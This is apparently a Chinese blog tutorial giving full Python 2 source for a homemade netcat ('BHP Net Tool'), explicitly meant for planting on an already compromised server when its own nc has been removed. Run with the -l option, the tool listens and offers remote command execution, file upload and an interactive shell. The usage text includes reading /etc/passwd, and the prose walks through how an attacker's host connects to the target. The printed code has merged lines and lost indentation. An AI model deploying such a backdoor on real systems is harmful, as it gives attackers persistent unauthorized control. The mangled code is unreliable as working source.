nc即netcat,是网络界的瑞士军刀。当入侵了一个服务器之后,发现nc工具已经被系统管理员移除之后,可以自己制作一个简单的客户端和服务器端来实现①上传文件②执行命令③开启一个新的命令行shell等几个功能。
__author__ = 'seven'
import sys
import socket
import getopt
import threading
import subprocess listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0 def usage():
print "BHP Net Tool"
print "Usage: netcat.py -t target_host -p port"
print "-l --listen - listen on [host]:[port] for incoming connections"
print "-e --execute=file_to_run - execute the given file upon receiving a connection"
print "-c --command - initialize a command shell"
print "-u --upload=destination - upon receiving connection upload a file and write to [destination]"
print "Examples: "
print "netcat.py -t 192.168.0.1 -p 5555 -l -c"
print "netcat.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"
print "netcat.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""
print "echo 'ABCDEFGHI' | ./netcat.py -t 192.168.11.12 -p 135"
sys.exit(0) def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
client.connect((target, port))
if len(buffer):
client.send(buffer) while True:
recv_len = 1
response = ""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response += data
if recv_len < 4096:
break print response, buffer = raw_input("")
buffer += "\n"
client.send(buffer) except:
print "[*] Exception! Exiting."
client.close() def server_loop():
global target
if not len(target):
target = "0.0.0.0" server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target, port))
server.listen(5) while True:
client_socket, addr = server.accept()
client_thread = threading.Thread(target=client_handler, args=(client_socket,))
client_thread.start() def run_command(command):
command = command.rstrip()
try:
output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
except:
output = "Failed to execute command.\r\n" return output def client_handler(client_socket):
global upload
global execute
global command if len(upload_destination):
file_buffer = ""
while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data try:
file_descriptor = open(upload_destination, "wb")
file_descriptor.write(file_buffer)
file_descriptor.close()
client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
except:
client_socket.send("Failed to save file to %s\r\n" % upload_destination) if len(execute):
output = run_command(execute)
client_socket.send(output) if command:
while True:
client_socket.send("<BHP:#> ")
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
response = run_command(cmd_buffer)
client_socket.send(response) def main():
global listen
global port
global execute
global command
global upload_destination
global target if not len(sys.argv[1:]):
usage() # read the commandline options
try:
opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu:",
["help", "listen", "execute", "target", "port", "command", "upload"])
except getopt.GetoptError as err:
print str(err)
usage() for o, a in opts:
if o in ("-h", "--help"):
usage()
elif o in ("-l", "--listen"):
listen = True
elif o in ("-e", "--execution"):
execute = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
elif o in ("-c", "--command"):
command = True
elif o in ("-u", "--upload"):
upload_destination = a
else:
assert False, "Unhandled Option" if not listen and len(target) and port > 0:
buffer = sys.stdin.read()
client_sender(buffer) if listen:
server_loop() main()
在主函数中,通过判断是否含有-l参数来决定是客户端还是服务器端。在实际应用中可以理解为,在目标服务器中作为服务器端以不同功能运行,监听来自攻击者主机的消息,例如以执行命令的功能运行,那么从攻击者主机发来的消息可能是一条命令,而如果以开启新的命令行shell的功能运行的话,那么攻击者主机就可以以命令行交互的方式访问目标服务器;攻击者主机作为客户端与目标服务器启动的程序连接,发送相应数据。
相应的一些例子:
开启两个终端,分别作为服务器端和客户端
服务器端
(图1)
客户端
(图2)
从图1中可以知道,-l参数说明开始监听,-c参数说明开启一个command shell,如果这操作在服务器上执行,那么意味着攻击者可以通过目标服务器的ip地址和9999端口对目标服务器进行访问并且可以以命令行交互的形式。图2就是一个简单的客户端连接,可以看到命令行交互的形式
这里补充一点:由于脚本读取的是标准输入知道接收到EOF(文件末尾)标志,所以看到图2会是这样。在Windows下是ctrl+z,在Linux下是ctrl+d。